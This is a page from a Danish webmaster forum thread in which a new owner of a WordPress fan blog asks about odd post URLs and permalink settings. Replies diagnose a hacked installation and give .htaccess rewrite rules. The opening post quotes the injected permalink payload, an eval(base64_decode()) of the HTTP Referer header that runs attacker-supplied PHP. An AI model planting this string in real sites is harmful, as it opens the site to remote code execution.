Hov. Du er ikke logget ind.
DU SKAL VÆRE LOGGET IND, FOR AT INTERAGERE PÅ DENNE SIDE

Hvad Betyder Mærkelig URL På Min Wordpress Blog?

Side 1 ud af 2 (16 indlæg)
Fra Esbjerg
Tilmeldt 13. Sep 06
Indlæg ialt: 638
Skrevet kl. 10:31
Hvor mange stjerner giver du? :

Hejsa

Jeg har fornylig erhvervet mig en eksisterende blog (Wordpress) www.emma-watson-fans.nei med over 1.000 posts. Den står stærkt i Google og er derfor lidt bange for at ændre noget på URL's som dette indlæg går på.

Jeg har 2 spørgsmål til jer, som jeg håber i kan hjælpe mig med at svare på.

-------------------

Spørgsmål 1. går på hvad endelsen (det i fed skrift) på f.eks denne URL betyder?:

http://www.emma-watson-fans.net/2009/10/12/emma-watson-at-london-fashion-week/%&%28%7B$%7Beval%28base64_decode%28$_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D|.+%29&%/

Det står på samtlige posts, blot med nogle udskiftninger af visse tegn.

Jeg kan se under permalink at det er tilføjet URL'en med denne kode:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

  1. Rent SEO mæssigt, betyder det at mine links fra f.eks Google bliver invalide hvis jeg sletter denne endelse?
  2. Og hvis jeg bliver nød til at lave en lave en 301 redirect på samtlige indlæg/post for at linksne på Google stadig virker, vil det så gå ud over min ranking. Har læst herinde på Amino i et indlæg, at det kun er 80% af linkjuicen som man får med over ved en redirect, er det korrekt?

---------------------

Spørgsmål 2. går på at Google åbenbart indekserer mine sider/posts fra bloggen med "Permalinks default" som f.eks:

http://www.emma-watson-fans.net/?p=123

Så alle links i Google står med domænet og så et tal bagefter. Altså ikke post navnet, som jeg ønsker.
Da jeg overtog bloggen var den indstillet til at have side/indlæg titlerne i URL'en, men det har Google åbenbart bare ikke opfanget!?

-------------------

Hvis du har nogle opklarende spørgsmål du behøver for at kunne svare, så skriv endelig.

På forhånd tak for hjælpen
Jean-Michel

Tilmeldt 1. May 07
Indlæg ialt: 313
Skrevet kl. 10:43
Hvor mange stjerner giver du? :

Lad mig gætte? Du har overtaget bloggen og flyttet den til en ny server?

Fra Korsør
Tilmeldt 3. May 07
Indlæg ialt: 566
Skrevet kl. 10:47
Hvor mange stjerner giver du? :

Jeg kan med sikkerhed sige at dette her ikke skal være i urlen: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Det ville jeg fjerne. Google har heller ikke indekseret nogen sider med de udtryk i urlen.

Det kunne godt se ud som om du er blev komprimenteret/hacked.

Men lad os se hvad andre mener!

Kevin Simper // Cykelrytter på fuldtid; Nørd på halvtid!

Fra Esbjerg
Tilmeldt 13. Sep 06
Indlæg ialt: 638
Skrevet kl. 10:47
Hvor mange stjerner giver du? :

Lazerto.dk:

Lad mig gætte? Du har overtaget bloggen og flyttet den til en ny server?

 

Æh ja, det er korrekt.

Er det derfor?

Ved du hvad jeg skal gøre?

 

Tilmeldt 1. May 07
Indlæg ialt: 313
Skrevet kl. 10:56
Hvor mange stjerner giver du? :
Gennemsnit 3,0 stjerner givet af 2 person

Godt, jeg skulle lige være sikker inden jeg skriver en hel masse. Jeg har ihvertfald løsningen på dit andet spørgsmål.

1 - I backend systemet skal du vælge "Settings" - "PermaLinks". Derefter markerer du "Custom Structure" og indsætter /%postname%/

2 - Derefter skal du redigere din HTaccess fil som ligger i roden af din server. Hvis du ikke har sådan en fil, man du oprette den fra notepad, den skal hedde ".htaccess"

I HTaccess filen indsætter du følgende:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

3. Så skulle dine blog post navne ihvertfald virke, og redde din google placeringer.

 

Fra Esbjerg
Tilmeldt 13. Sep 06
Indlæg ialt: 638
Skrevet kl. 10:56
Hvor mange stjerner giver du? :

Hej Kevin

Men hvad så med det faktum at Google har indekseret mine sider med tal i enden og ikke titler, som omskrevet til at starte med?

Har du tilfældigvis noget bud på det?

Fra Esbjerg
Tilmeldt 13. Sep 06
Indlæg ialt: 638
Skrevet kl. 11:04
Hvor mange stjerner giver du? :

Hej Lazerto!

Lige inden jeg gør det, kan jeg så godt kun skrive:  /%postname%/   ?

Lige nu der står jo hele denne streng:

/%year%/%monthnum%/%day%/%postname%/

Og må jeg gerne istedet skrive:

/%postname%.html 

Uden at jeg skal ændre i det du har skrevet til HTaccess filen?

 

Tilmeldt 1. May 07
Indlæg ialt: 313
Skrevet kl. 11:06
Hvor mange stjerner giver du? :

Ja, det kan godt godt :) Du behøver ikke ændre teksten til HTaccess filen

Fra Chlorakas
Tilmeldt 9. Jan 06
Indlæg ialt: 2169
Skrevet kl. 11:10
Hvor mange stjerner giver du? :

Vent, Stop! :-)

Inden du kaster dig ud i diverse ændringer af indstillinger, er det vigtigt at forstå hvad årsagen er. Specielt i dette tilfælde for det ser ud til at årsagen er at din installation er hacket i forbindelse med at Wordpress ikke løbende har været opdateret.

Se dette indlæg: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

Det betyder en verden til forskel i hvordan du skal håndtere problemet.

Først skal du have ryddet op og sikret din installation ordentligt.

Og så skal du have fundet en løsning for problemet med permalinks. Helst en løsning som sikrer at der 301-redirectes fra de hackede nuværende urls til de nye urls.

Mvh Anders

Nordic Key Account Manager hos Partner-Ads.com
Medstifter af Marketers.dk, det danske Affiliate Marketing Forum.  Og ejer af Saugstrup.org, redaktionel linkbuilding. 

Tilmeldt 1. May 07
Indlæg ialt: 313
Skrevet kl. 11:12
Hvor mange stjerner giver du? :

Mht permalinks er jeg ret så sikker på hvad jeg har skrevet. Jeg beskæftiger mig meget med wordpress installationer. Ved at ændre indlæg titlerne tilbage til hvad de var da han købte bloggen, vil de jo passe som han ønsker det.

Side 1 ud af 2 (16 indlæg)